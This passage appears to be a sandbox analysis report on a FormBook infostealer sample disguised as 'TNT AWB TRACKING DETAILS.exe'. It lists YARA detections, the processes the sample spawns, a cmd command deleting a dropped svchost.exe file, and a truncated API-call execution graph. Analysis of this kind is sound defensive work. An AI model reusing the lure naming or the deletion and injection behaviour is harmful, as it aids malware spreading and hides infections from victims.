                                    Commandline:"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                                    Imagebase:0xa60000
                                    File size:46'504 bytes
                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:03:06:27
                                    Start date:25/09/2024
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff633410000
                                    File size:5'141'208 bytes
                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.3861610506.0000000010C89000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:4
                                    Start time:03:06:30
                                    Start date:25/09/2024
                                    Path:C:\Windows\SysWOW64\wlanext.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\wlanext.exe"
                                    Imagebase:0x6f0000
                                    File size:78'336 bytes
                                    MD5 hash:0D5F0A7CA2A8A47E3A26FB1CB67E118C
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate
                                    Has exited:false

                                    General

                                    Target ID:5
                                    Start time:03:06:33
                                    Start date:25/09/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                    Imagebase:0xc50000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:03:06:34
                                    Start date:25/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:3.7%
                                      Dynamic/Decrypted Code Coverage:1.5%
                                      Signature Coverage:8.7%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:37
                                      execution_graph 86281 4010e0 86284 401100 86281->86284 86283 4010f8 86285 401113 86284->86285 86286 401182 86285->86286 86288 401120 86285->86288 86289 401184 86285->86289 86290 40114c 86285->86290 86287 40112c DefWindowProcW 86286->86287 86287->86283 86288->86287 86343 401000 Shell_NotifyIconW __call_reportfault 86288->86343 86322 401250 86289->86322 86292 401151 86290->86292 86293 40119d 86290->86293 86297 401219 86292->86297 86298 40115d 86292->86298 86295 4011a3 86293->86295 86296 42afb4 86293->86296 86294 401193 86294->86283 86295->86288 86305 4011b6 KillTimer 86295->86305 86306 4011db SetTimer RegisterWindowMessageW 86295->86306 86338 40f190 10 API calls 86296->86338 86297->86288 86301 401225 86297->86301 86299 401163 86298->86299 86300 42b01d 86298->86300 86307 42afe9 86299->86307 86308 40116c 86299->86308 86300->86287 86342 4370f4 52 API calls 86300->86342 86354 468b0e 74 API calls __call_reportfault 86301->86354 86304 42b04f 86344 40e0c0 86304->86344 86337 401000 Shell_NotifyIconW __call_reportfault 86305->86337 86306->86294 86313 401204 CreatePopupMenu 86306->86313 86340 40f190 10 API calls 86307->86340 86308->86288 86315 401174 86308->86315 86313->86283 86339 45fd57 65 API calls __call_reportfault 86315->86339 86316 42afe4 86316->86294 86317 42b00e 86341 401a50 330 API calls 86317->86341 86318 4011c9 PostQuitMessage 86318->86283 86321 42afdc 86321->86287 86321->86316 86323 401262 __call_reportfault 86322->86323 86324 4012e8 86322->86324 86355 401b80 86323->86355 86324->86294 86326 4012d1 KillTimer SetTimer 86326->86324 86327 40128c 86327->86326 86328 4012bb 86327->86328 86329 4272ec 86327->86329 86332 4012c5 86328->86332 86333 42733f 86328->86333 86330 4272f4 Shell_NotifyIconW 86329->86330 86331 42731a Shell_NotifyIconW 86329->86331 86330->86326 86331->86326 86332->86326 86334 427393 Shell_NotifyIconW 86332->86334 86335 427348 Shell_NotifyIconW 86333->86335 86336 42736e Shell_NotifyIconW 86333->86336 86334->86326 86335->86326 86336->86326 86337->86318 86338->86294 86339->86321 86340->86317 86341->86286 86342->86286 86343->86304 86346 40e0e7 __call_reportfault 86344->86346 86345 40e142 86352 40e184 86345->86352 86453 4341e6 63 API calls __wcsicoll 86345->86453 86346->86345 86347 42729f DestroyIcon 86346->86347 86347->86345 86349 40e1a0 Shell_NotifyIconW 86351 401b80 54 API calls 86349->86351 86350 4272db Shell_NotifyIconW 86353 40e1ba 86351->86353 86352->86349 86352->86350 86353->86286 86354->86316 86356 401b9c 86355->86356 86357 401c7e 86355->86357 86377 4013c0 86356->86377 86357->86327 86360 42722b LoadStringW 86363 427246 86360->86363 86361 401bb9 86382 402160 86361->86382 86396 40e0a0 86363->86396 86364 401bcd 86366 427258 86364->86366 86367 401bda 86364->86367 86400 40d200 52 API calls 2 library calls 86366->86400 86367->86363 86368 401be4 86367->86368 86395 40d200 52 API calls 2 library calls 86368->86395 86371 427267 86372 42727b 86371->86372 86374 401bf3 _wcscpy __call_reportfault _wcsncpy 86371->86374 86401 40d200 52 API calls 2 library calls 86372->86401 86376 401c62 Shell_NotifyIconW 86374->86376 86375 427289 86376->86357 86402 4115d7 86377->86402 86383 426daa 86382->86383 86384 40216b _wcslen 86382->86384 86440 40c600 86383->86440 86387 402180 86384->86387 86388 40219e 86384->86388 86386 426db5 86386->86364 86439 403bd0 52 API calls ctype 86387->86439 86390 4013a0 52 API calls 86388->86390 86391 4021a5 86390->86391 86392 426db7 86391->86392 86393 4115d7 52 API calls 86391->86393 86394 402187 _memmove 86393->86394 86394->86364 86395->86374 86397 40e0b2 86396->86397 86398 40e0a8 86396->86398 86397->86374 86452 403c30 52 API calls _memmove 86398->86452 86400->86371 86401->86375 86404 4115e1 _malloc 86402->86404 86405 4013e4 86404->86405 86407 4115fd std::exception::exception 86404->86407 86416 4135bb 86404->86416 86413 4013a0 86405->86413 86411 41163b 86407->86411 86430 41130a 51 API calls __cinit 86407->86430 86408 411645 86432 418105 RaiseException 86408->86432 86431 4180af 46 API calls std::exception::operator= 86411->86431 86412 411656 86414 4115d7 52 API calls 86413->86414 86415 4013a7 86414->86415 86415->86360 86415->86361 86417 413638 _malloc 86416->86417 86422 4135c9 _malloc 86416->86422 86438 417f77 46 API calls __getptd_noexit 86417->86438 86420 4135f7 RtlAllocateHeap 86420->86422 86429 413630 86420->86429 86422->86420 86423 4135d4 86422->86423 86424 413624 86422->86424 86427 413622 86422->86427 86423->86422 86433 418901 46 API calls __NMSG_WRITE 86423->86433 86434 418752 46 API calls 6 library calls 86423->86434 86435 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86423->86435 86436 417f77 46 API calls __getptd_noexit 86424->86436 86437 417f77 46 API calls __getptd_noexit 86427->86437 86429->86404 86430->86411 86431->86408 86432->86412 86433->86423 86434->86423 86436->86427 86437->86429 86438->86429 86439->86394 86441 40c619 86440->86441 86442 40c60a 86440->86442 86441->86386 86442->86441 86445 4026f0 86442->86445 86444 426d7a _memmove 86444->86386 86446 426873 86445->86446 86447 4026ff 86445->86447 86448 4013a0 52 API calls 86446->86448 86447->86444 86449 42687b 86448->86449 86450 4115d7 52 API calls 86449->86450 86451 42689e _memmove 86450->86451 86451->86444 86452->86397 86453->86352 86454 40bd20 86455 428194 86454->86455 86463 40bd2d 86454->86463 86456 40bd43 86455->86456 86458 4281bc 86455->86458 86459 4281b2 86455->86459 86476 45e987 86 API calls ctype 86458->86476 86475 40b510 VariantClear 86459->86475 86464 40bd37 86463->86464 86477 4531b1 85 API calls 5 library calls 86463->86477 86466 40bd50 86464->86466 86465 4281ba 86467 426cf1 86466->86467 86468 40bd63 86466->86468 86487 44cde9 52 API calls _memmove 86467->86487 86478 40bd80 86468->86478 86471 426cfc 86473 40e0a0 52 API calls 86471->86473 86472 40bd73 86472->86456 86474 426d02 86473->86474 86475->86465 86476->86463 86477->86464 86479 40bd8e 86478->86479 86486 40bdb7 _memmove 86478->86486 86480 40bded 86479->86480 86481 40bdad 86479->86481 86479->86486 86483 4115d7 52 API calls 86480->86483 86488 402f00 86481->86488 86484 40bdf6 86483->86484 86485 4115d7 52 API calls 86484->86485 86484->86486 86485->86486 86486->86472 86487->86471 86489 402f10 86488->86489 86490 402f0c 86488->86490 86491 4115d7 52 API calls 86489->86491 86492 4268c3 86489->86492 86490->86486 86493 402f51 ctype _memmove 86491->86493 86493->86486 86494 425ba2 86499 40e360 86494->86499 86496 425bb4 86515 41130a 51 API calls __cinit 86496->86515 86498 425bbe 86500 4115d7 52 API calls 86499->86500 86501 40e3ec GetModuleFileNameW 86500->86501 86516 413a0e 86501->86516 86503 40e421 _wcsncat 86519 413a9e 86503->86519 86506 4115d7 52 API calls 86507 40e45e _wcscpy 86506->86507 86522 40bc70 86507->86522 86511 40e4a9 86511->86496 86512 401c90 52 API calls 86513 40e4a1 _wcscat _wcslen _wcsncpy 86512->86513 86513->86511 86513->86512 86514 4115d7 52 API calls 86513->86514 86514->86513 86515->86498 86541 413801 86516->86541 86571 419efd 86519->86571 86523 4115d7 52 API calls 86522->86523 86524 40bc98 86523->86524 86525 4115d7 52 API calls 86524->86525 86526 40bca6 86525->86526 86527 40e4c0 86526->86527 86583 403350 86527->86583 86529 40e4cb RegOpenKeyExW 86530 427190 RegQueryValueExW 86529->86530 86531 40e4eb 86529->86531 86532 4271b0 86530->86532 86533 42721a RegCloseKey 86530->86533 86531->86513 86534 4115d7 52 API calls 86532->86534 86533->86513 86535 4271cb 86534->86535 86590 43652f 52 API calls 86535->86590 86537 4271d8 RegQueryValueExW 86538 42720e 86537->86538 86539 4271f7 86537->86539 86538->86533 86540 402160 52 API calls 86539->86540 86540->86538 86542 41389e 86541->86542 86548 41381a 86541->86548 86543 4139e8 86542->86543 86545 413a00 86542->86545 86568 417f77 46 API calls __getptd_noexit 86543->86568 86570 417f77 46 API calls __getptd_noexit 86545->86570 86546 4139ed 86569 417f25 10 API calls __vswprintf_l 86546->86569 86548->86542 86556 41388a 86548->86556 86563 419e30 46 API calls __vswprintf_l 86548->86563 86551 41396c 86551->86542 86553 413967 86551->86553 86554 41397a 86551->86554 86552 413929 86552->86542 86555 413945 86552->86555 86565 419e30 46 API calls __vswprintf_l 86552->86565 86553->86503 86567 419e30 46 API calls __vswprintf_l 86554->86567 86555->86542 86555->86553 86559 41395b 86555->86559 86556->86542 86562 413909 86556->86562 86564 419e30 46 API calls __vswprintf_l 86556->86564 86566 419e30 46 API calls __vswprintf_l 86559->86566 86562->86551 86562->86552 86563->86556 86564->86562 86565->86555 86566->86553 86567->86553 86568->86546 86569->86553 86570->86553 86572 419f13 86571->86572 86573 419f0e 86571->86573 86580 417f77 46 API calls __getptd_noexit 86572->86580 86573->86572 86576 419f2b 86573->86576 86575 419f18 86581 417f25 10 API calls __vswprintf_l 86575->86581 86579 40e454 86576->86579 86582 417f77 46 API calls __getptd_noexit 86576->86582 86579->86506 86580->86575 86581->86579 86582->86575 86584 403367 86583->86584 86585 403358 86583->86585 86586 4115d7 52 API calls 86584->86586 86585->86529 86587 403370 86586->86587 86588 4115d7 52 API calls 86587->86588 86589 40339e 86588->86589 86589->86529 86590->86537 86591 3f3bc20 86605 3f39870 86591->86605 86593 3f3bd09 86608 3f3bb10 86593->86608 86611 3f3cd30 GetPEB 86605->86611 86607 3f39efb 86607->86593 86609 3f3bb19 Sleep 86608->86609 86610 3f3bb27 86609->86610 86612 3f3cd5a 86611->86612 86612->86607 86613 40b374 86614 40b328 86613->86614 86617 40f430 86614->86617 86616 40b333 86618 40f444 86617->86618 86624 40cc70 86618->86624 86620 40f462 86621 40f46b 86620->86621 86633 40c790 VariantClear ctype 86620->86633 86621->86616 86623 40f487 86623->86616 86634 40a780 86624->86634 86626 40cc96 86627 42bd0e 86626->86627 86628 40cc9e 86626->86628 86629 408f40 VariantClear 86627->86629 86675 408f40 86628->86675 86630 42bd16 86629->86630 86630->86620 86632 40ccb8 86632->86620 86633->86623 86635 40a7a6 86634->86635 86636 40ae8c 86634->86636 86638 4115d7 52 API calls 86635->86638 86693 41130a 51 API calls __cinit 86636->86693 86647 40a7c6 ctype _memmove 86638->86647 86639 40a86d 86641 40abd1 86639->86641 86643 40a878 ctype 86639->86643 86640 408e80 VariantClear 86640->86647 86704 45e737 90 API calls 3 library calls 86641->86704 86650 408f40 VariantClear 86643->86650 86655 40a884 ctype 86643->86655 86644 40bc10 53 API calls 86644->86647 86646 42b791 VariantClear 86646->86647 86647->86639 86647->86640 86647->86641 86647->86644 86647->86646 86648 40b5f0 89 API calls 86647->86648 86649 42ba2d VariantClear 86647->86649 86651 42b459 VariantClear 86647->86651 86652 4115d7 52 API calls 86647->86652 86656 42b6f6 VariantClear 86647->86656 86657 4530c9 VariantClear 86647->86657 86659 40e270 VariantClear 86647->86659 86660 42bbf5 86647->86660 86661 4115d7 52 API calls 86647->86661 86665 42bb6a 86647->86665 86666 408f40 VariantClear 86647->86666 86670 42bc37 86647->86670 86679 408cc0 86647->86679 86694 401b10 86647->86694 86700 45308a 53 API calls 86647->86700 86701 470870 52 API calls 86647->86701 86702 457f66 87 API calls __write_nolock 86647->86702 86703 472f47 127 API calls 86647->86703 86648->86647 86649->86647 86650->86643 86651->86647 86652->86647 86655->86626 86656->86647 86657->86647 86658 42bc5b 86658->86626 86659->86647 86705 45e737 90 API calls 3 library calls 86660->86705 86663 42b5b3 VariantInit VariantCopy 86661->86663 86663->86647 86667 42b5d7 VariantClear 86663->86667 86707 44b92d VariantClear 86665->86707 86666->86647 86667->86647 86706 45e737 90 API calls 3 library calls 86670->86706 86673 42bc48 86673->86665 86674 408f40 VariantClear 86673->86674 86674->86665 86676 408f48 ctype 86675->86676 86677 4265c7 VariantClear 86676->86677 86678 408f55 ctype 86676->86678 86677->86678 86678->86632 86708 408d90 86679->86708 86681 408cf9 86682 429778 86681->86682 86685 42976c 86681->86685 86687 408d2d 86681->86687 86736 410c60 VariantClear ctype 86682->86736 86684 429780 86735 45e737 90 API calls 3 library calls 86685->86735 86724 403d10 86687->86724 86690 408d71 ctype 86690->86647 86691 408f40 VariantClear 86692 408d45 ctype 86691->86692 86692->86690 86692->86691 86693->86647 86695 401b16 _wcslen 86694->86695 86696 4115d7 52 API calls 86695->86696 86699 401b63 86695->86699 86697 401b4b _memmove 86696->86697 86698 4115d7 52 API calls 86697->86698 86698->86699 86699->86647 86700->86647 86701->86647 86702->86647 86703->86647 86704->86665 86705->86665 86706->86673 86707->86658 86709 4289d2 86708->86709 86710 408db3 86708->86710 86747 45e737 90 API calls 3 library calls 86709->86747 86737 40bec0 86710->86737 86713 4289e5 86748 45e737 90 API calls 3 library calls 86713->86748 86714 408e5a 86714->86681 86716 428a05 86719 408f40 VariantClear 86716->86719 86718 408dc9 86718->86713 86718->86714 86718->86716 86720 40a780 199 API calls 86718->86720 86721 408e64 86718->86721 86723 408f40 VariantClear 86718->86723 86741 40ba10 86718->86741 86719->86714 86720->86718 86722 408f40 VariantClear 86721->86722 86722->86714 86723->86718 86725 408f40 VariantClear 86724->86725 86726 403d20 86725->86726 86750 403cd0 86726->86750 86728 403d4d 86730 4013c0 52 API calls 86728->86730 86754 477145 86728->86754 86759 4755ad 86728->86759 86762 46adb6 86728->86762 86767 46f8cb 86728->86767 86729 403d76 86729->86682 86729->86692 86730->86729 86735->86682 86736->86684 86738 40bed0 86737->86738 86739 40bef2 86738->86739 86749 45e737 90 API calls 3 library calls 86738->86749 86739->86718 86742 40ba49 86741->86742 86745 40ba1b ctype _memmove 86741->86745 86744 4115d7 52 API calls 86742->86744 86743 4115d7 52 API calls 86746 40ba22 86743->86746 86744->86745 86745->86743 86746->86718 86747->86713 86748->86716 86749->86739 86751 403cdf 86750->86751 86752 408f40 VariantClear 86751->86752 86753 403ce7 86752->86753 86753->86728 86786 408e80 86754->86786 86758 477160 86758->86729 86813 475077 86759->86813 86761 4755c0 86761->86729 86927 4680ed 86762->86927 86764 46adcb 86931 453132 53 API calls __call_reportfault 86764->86931 86766 46ae24 _memmove 86766->86729 86768 46f8e7 86767->86768 86769 46f978 86767->86769 86770 46f900 86768->86770 86771 46f8ee 86768->86771 86772 46f93c 86768->86772 86773 46f91a 86768->86773 86769->86729 86776 45340c 85 API calls 86770->86776 86932 45340c 86771->86932 86775 45340c 85 API calls 86772->86775 86774 45340c 85 API calls 86773->86774 86777 46f931 86774->86777 86778 46f958 86775->86778 86776->86771 86780 45340c 85 API calls 86777->86780 86781 45340c 85 API calls 86778->86781 86780->86771 86784 46f95f 86781->86784 86782 46f971 86938 46cb5f 86782->86938 86785 45340c 85 API calls 86784->86785 86785->86771 86787 408e88 86786->86787 86789 408e94 86786->86789 86788 408f40 VariantClear 86787->86788 86788->86789 86790 467ac4 86789->86790 86791 467bb8 86790->86791 86792 467adc 86790->86792 86791->86758 86793 467c1d 86792->86793 86794 467c16 86792->86794 86795 467b90 86792->86795 86802 467aed 86792->86802 86797 4115d7 52 API calls 86793->86797 86812 40e270 VariantClear ctype 86794->86812 86798 4115d7 52 API calls 86795->86798 86809 467b75 _memmove 86797->86809 86798->86809 86799 467b55 86801 4115d7 52 API calls 86799->86801 86800 4115d7 52 API calls 86800->86791 86803 467b5b 86801->86803 86804 4115d7 52 API calls 86802->86804 86808 467b28 ctype 86802->86808 86810 442ee0 52 API calls 86803->86810 86804->86808 86806 467b6b 86811 45f645 54 API calls ctype 86806->86811 86808->86793 86808->86799 86808->86809 86809->86800 86810->86806 86811->86809 86812->86793 86866 4533eb 86813->86866 86816 4750ee 86818 408f40 VariantClear 86816->86818 86817 475129 86870 4646e0 86817->86870 86824 4750f5 86818->86824 86820 47515e 86821 475162 86820->86821 86854 47518e 86820->86854 86823 408f40 VariantClear 86821->86823 86822 475357 86825 475365 86822->86825 86826 4754ea 86822->86826 86840 475169 86823->86840 86824->86761 86904 44b3ac 57 API calls 86825->86904 86910 464812 92 API calls 86826->86910 86830 475374 86883 430d31 86830->86883 86831 4754fc 86831->86830 86833 475508 86831->86833 86832 4533eb 85 API calls 86832->86854 86834 408f40 VariantClear 86833->86834 86836 47550f 86834->86836 86836->86840 86837 475388 86890 4577e9 86837->86890 86840->86761 86841 47539e 86898 410cfc 86841->86898 86842 475480 86844 408f40 VariantClear 86842->86844 86844->86840 86846 4753d4 86906 40e830 53 API calls 86846->86906 86847 4753b8 86905 45e737 90 API calls 3 library calls 86847->86905 86850 4753c5 GetCurrentProcess TerminateProcess 86850->86846 86851 4753e3 86864 475406 86851->86864 86907 40cf00 53 API calls 86851->86907 86852 4754b5 86853 408f40 VariantClear 86852->86853 86853->86840 86854->86822 86854->86832 86854->86842 86854->86852 86902 436299 52 API calls 2 library calls 86854->86902 86903 463ad5 64 API calls __wcsicoll 86854->86903 86856 4753f8 86908 46c43e 106 API calls 2 library calls 86856->86908 86859 475556 86859->86840 86860 47556e FreeLibrary 86859->86860 86860->86840 86863 408e80 VariantClear 86863->86864 86864->86859 86864->86863 86865 408f40 VariantClear 86864->86865 86909 40cf00 53 API calls 86864->86909 86911 44b3ac 57 API calls 86864->86911 86912 46c43e 106 API calls 2 library calls 86864->86912 86865->86864 86867 453404 86866->86867 86868 4533f8 86866->86868 86867->86816 86867->86817 86868->86867 86913 4531b1 85 API calls 5 library calls 86868->86913 86914 4536f7 53 API calls 86870->86914 86872 4646fc 86915 4426cd 59 API calls _wcslen 86872->86915 86874 464711 86876 40bc70 52 API calls 86874->86876 86882 46474b 86874->86882 86877 46472c 86876->86877 86916 461465 52 API calls _memmove 86877->86916 86879 464741 86880 40c600 52 API calls 86879->86880 86880->86882 86881 464793 86881->86820 86882->86881 86917 463ad5 64 API calls __wcsicoll 86882->86917 86884 430db2 86883->86884 86885 430d54 86883->86885 86884->86837 86886 4115d7 52 API calls 86885->86886 86889 430d74 86886->86889 86887 430da9 86887->86837 86888 4115d7 52 API calls 86888->86889 86889->86887 86889->86888 86891 457a84 86890->86891 86892 45780c _strcat _wcslen _wcscpy ctype 86890->86892 86891->86841 86892->86891 86893 443006 57 API calls 86892->86893 86895 4135bb 46 API calls _malloc 86892->86895 86896 45340c 85 API calls 86892->86896 86918 40f6f0 86892->86918 86926 44b3ac 57 API calls 86892->86926 86893->86892 86895->86892 86896->86892 86899 410d11 86898->86899 86900 410da9 VirtualProtect 86899->86900 86901 410d77 86899->86901 86900->86901 86901->86846 86901->86847 86902->86854 86903->86854 86904->86830 86905->86850 86906->86851 86907->86856 86908->86864 86909->86864 86910->86831 86911->86864 86912->86864 86913->86867 86914->86872 86915->86874 86916->86879 86917->86881 86919 425de2 86918->86919 86922 40f6fc _wcslen 86918->86922 86919->86892 86920 40f710 WideCharToMultiByte 86921 40f756 86920->86921 86923 40f728 86920->86923 86921->86892 86922->86920 86924 4115d7 52 API calls 86923->86924 86925 40f735 WideCharToMultiByte 86924->86925 86925->86892 86926->86892 86928 468100 86927->86928 86929 4680fa 86927->86929 86928->86764 86930 467ac4 55 API calls 86929->86930 86930->86928 86931->86766 86933 453439 86932->86933 86934 453419 86932->86934 86933->86782 86935 45342f 86934->86935 86982 4531b1 85 API calls 5 library calls 86934->86982 86935->86782 86937 453425 86937->86782 86939 40bc70 52 API calls 86938->86939 86940 46cb7e 86939->86940 86941 40bc70 52 API calls 86940->86941 86942 46cb86 86941->86942 86943 40bc70 52 API calls 86942->86943 86944 46cb91 86943->86944 86945 408f40 VariantClear 86944->86945 86946 46cbaf 86945->86946 86947 46cbd4 CLSIDFromProgID 86946->86947 86948 46cbc5 OleInitialize 86946->86948 86949 46cc33 86947->86949 86950 46cbe9 CLSIDFromString 86947->86950 86948->86947 86951 46cca6 86949->86951 86952 46cc49 CoCreateInstance 86949->86952 86950->86949 86953 46cbfb 86950->86953 86984 458651 59 API calls __call_reportfault 86951->86984 86952->86953 86959 46cc62 86952->86959 86983 451b42 61 API calls 86953->86983 86955 46ccb3 86955->86953 86957 46ccbc CoInitializeSecurity 86955->86957 86958 46ccdf __call_reportfault 86957->86958 86985 4311fc CoTaskMemAlloc _wcslen _wcscpy 86958->86985 86959->86953 86963 46ceb7 86959->86963 86961 46ccf2 86962 46cd86 _wcslen __call_reportfault 86961->86962 86965 402160 52 API calls 86961->86965 86967 46ce09 CoCreateInstanceEx CoTaskMemFree 86962->86967 86970 46cd21 86962->86970 86988 468070 104 API calls ctype 86963->86988 86964 46cc0b 86964->86769 86969 46cd0c 86965->86969 86967->86953 86968 46ce50 86967->86968 86968->86953 86971 46ce64 CoSetProxyBlanket 86968->86971 86972 46ce8d 86968->86972 86969->86970 86986 465177 52 API calls 86969->86986 86970->86962 86971->86972 86972->86959 86974 46cea4 86972->86974 86974->86953 86975 46cd46 86976 40e0a0 52 API calls 86975->86976 86977 46cd4f 86976->86977 86987 46150f 52 API calls 86977->86987 86978 46cec2 86978->86769 86980 46cd7a 86981 40e0a0 52 API calls 86980->86981 86981->86962 86982->86937 86983->86964 86984->86955 86985->86961 86986->86975 86987->86980 86988->86978 86989 416454 87026 416c70 86989->87026 86991 416460 GetStartupInfoW 86992 416474 86991->86992 87027 419d5a HeapCreate 86992->87027 86994 4164cd 86995 4164d8 86994->86995 87111 41642b 46 API calls 3 library calls 86994->87111 87028 417c20 GetModuleHandleW 86995->87028 86998 4164de 86999 4164e9 __RTC_Initialize 86998->86999 87112 41642b 46 API calls 3 library calls 86998->87112 87047 41aaa1 GetStartupInfoW 86999->87047 87003 416503 GetCommandLineW 87060 41f584 GetEnvironmentStringsW 87003->87060 87007 416513 87066 